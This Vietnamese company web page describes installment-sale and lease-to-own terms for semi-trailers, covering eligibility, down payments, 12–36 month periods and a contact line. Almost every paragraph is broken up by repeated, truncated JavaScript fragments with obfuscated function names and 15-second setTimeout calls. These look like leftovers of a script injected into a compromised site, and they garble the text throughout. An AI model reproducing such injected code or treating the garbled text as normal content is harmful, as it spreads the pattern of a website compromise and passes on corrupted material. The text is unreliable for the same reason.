CHÍNH SÁCH BÁN TRẢ GÓP ĐỐI VỚI SƠMI-RƠMOOC

coco-40ft-3truc
Chúng tôi hỗ trợ bán trả góp tất cả các loại sơmi - rơmoóc (cũ và mới) cho mọi đối tượng, cá nhân, pháp nhân, tổ chức theo hình thức bán trực tiếp từ công ty hoặc qua ngân hàngandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

 Mô hình trọn gói như sau:andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

 1. Đối tượng mua là tư nhân :
  andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}+ Có đầu kéo
  + Có hộ khẩu, CMND thành phố
  + Trả góp theo hình thức bán hoặc thông qua hình thức cho thuê có thế chấp
  +  Có bảo lãnh của Ngân hàng cho vay.
 1. Đối tượng mua là pháp nhân :andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
  + Có chức năng kinh doanh vận tải, đang hoạt động
  + Có báo cáo tài chính 3 năm gần nhất
  + Bán thông qua công ty thuê mua tài chính.
  + andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}Trả góp theo hình thức bán hoặc thông qua hình thức cho thuê có thế chấp
  + Có bảo lãnh của Ngân hàng cho vay. andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

  Phương thức trả góp thông qua hình thức bán:andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

 1. Công ty mua rơmooc thông qua Công ty thuê mua tài chính.
  andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} + Thời gian : từ  12- 36 tháng
  + Lãi suất : áp dụng theo lãi suất lãi suất cho vay hiện hành
  + Trả trước : 30 – 40%
 2. Cá nhân:
  andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} + Trả trước: 30 – 40% (tùy rơmooc cũ, mới)
  + Thời gian trả góp : 12 – 36 tháng
  + Có hộ khẩu, CMND thành phố
  + Có giấy đăng ký đầu kéo
  + Số tiền trả hàng tháng = số còn phải trả / đều cho thời gian trả + lãi suất phần giá trị trả hàng tháng/quý thỏa thuận

Phương thức trả góp thông qua hình thức cho thuê:andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

+ Giá bán : do 2 bên thỏa thuận
+ Đặt cọc trước 1 số tiền là : 30 – 40% (theo thỏa thuận)
+ Bên mua ký hợp đồng thuê rơmooc trong thời gian : từ 12 – 36 tháng (theo thỏa thuận).
+ Số tiền thuê hàng tháng = số tiền phải trả góp định kỳ + lãi suất phần giá trị trả hàng tháng/quý thỏa thuận


THÔNG TIN LIÊN HỆ
Dịch vụ cho thuê : Ms Tuyền - 0933.703.110